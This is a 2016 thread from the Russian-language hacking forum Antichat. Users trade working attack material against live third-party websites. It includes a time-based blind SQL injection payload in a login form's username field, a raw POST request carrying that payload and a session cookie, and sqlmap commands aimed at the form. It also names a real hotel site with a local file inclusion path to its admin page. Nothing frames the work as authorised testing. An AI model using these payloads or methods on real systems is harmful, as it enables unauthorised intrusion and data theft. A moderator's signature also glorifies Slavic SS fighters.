ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.12.2016, 23:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от madam
madam said:
↑
в смысле логин и пароль ,уже пыталась
'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
вот таким перебором вытащила имя базы
но вот sqlmap никак нехочет найти ihj Должен sqlmap -u site.com/login/ --form пробуйте
|
|
|
|
07.12.2016, 00:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
Сообщение от BabaDook
BabaDook said:
↑
Должен sqlmap -u site.com/login/ --form пробуйте --forms тоже нет((
|
|
|
|
07.12.2016, 12:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
sqlmap умеет загружать куки сам?может в этом проблема
|
|
|
|
07.12.2016, 12:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом http://hotel-stalingrad.ru/index.php?page=cafe там так же инклудятся локальные файлы как и c этим сайтом
Код:
Code:
hotel-stalingrad.ru/index.php?page=../admin/index
На сайте игры стоит php 5.4.45 apache 2.2.2
Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
Но я так понял что [4096] слешей не работают с php версией 5.4.45 |
|
|
|
07.12.2016, 12:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от nik1201
nik1201 said:
↑
А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом
http://hotel-stalingrad.ru/index.php?page=cafe
там так же инклудятся локальные файлы как и c этим сайтом
Код:
Code:
hotel-stalingrad.ru/index.php?page=../admin/index
На сайте игры стоит php 5.4.45 apache 2.2.2
Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
Но я так понял что [4096] слешей не работают с php версией 5.4.45 Ну не откинешь ты .php с этого и надо было начинать
|
|
|
|
07.12.2016, 13:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
51991
Репутация:
2
|
|
Сообщение от madam
madam said:
↑
Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так? Cохрани все в файл и пробни sqlmap.py -r 'file.txt'
|
|
|
|
07.12.2016, 14:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable
какие только параметры не задавала((
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
всё что узнала(
|
|
|
|
07.12.2016, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от madam
madam said:
↑
да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable
какие только параметры не задавала((
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
всё что узнала( ты руками то пробовала, там есть вообще скуль?
если есть - изучай софт гадать тут долго можно почему не крутит
|
|
|
|
07.12.2016, 14:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
скуля есть что параметре username что в password
могу скинуть сайт, если подскажете
|
|
|
|
07.12.2016, 14:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от madam
madam said:
↑
скуля есть что параметре username что в password
могу скинуть сайт, если подскажете что мешает плодить посты в соседней теме, специально для SQLMAP'a? я чуть позже все удалю.
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
